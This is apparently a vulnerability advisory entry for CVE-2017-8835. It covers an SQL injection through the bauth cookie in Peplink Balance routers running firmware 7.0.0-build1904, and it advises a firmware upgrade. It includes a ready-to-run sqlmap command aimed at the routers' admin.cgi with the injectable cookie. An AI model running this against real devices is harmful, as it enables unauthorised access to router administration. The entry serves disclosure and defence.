Vendor: Balance Routers 305, 380, 580, 710, 1350, 2500
By: X41 D-Sec GmbH, Eric Sesterhenn
CVSS: 9.8 (CRITICAL)
SQL Injection via bauth Cookie
CWE: 89
Product Name: Balance Routers 305, 380, 580, 710, 1350, 2500
Affected Version From: 7.0.0-build1904
Affected Version To: 7.0.0-build1904
Patch Exists: YES
Related CVE: CVE-2017-8835
CPE: h:peplink:balance_routers_305,_380,_580,_710,_1350,_2500
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017
Multiple Vulnerabilities in Peplink Balance Routers
Peplink devices are vulnerable to SQL injection via the bauth cookie parameter, which is set, for example, when accessing https://ip/cgi-bin/MANGA/admin.cgi. The injection can be checked with the following command:

    ./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi" --cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647" -p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ --flush-session -t trace.log -v 3

Mitigation:
Upgrade to the latest firmware version.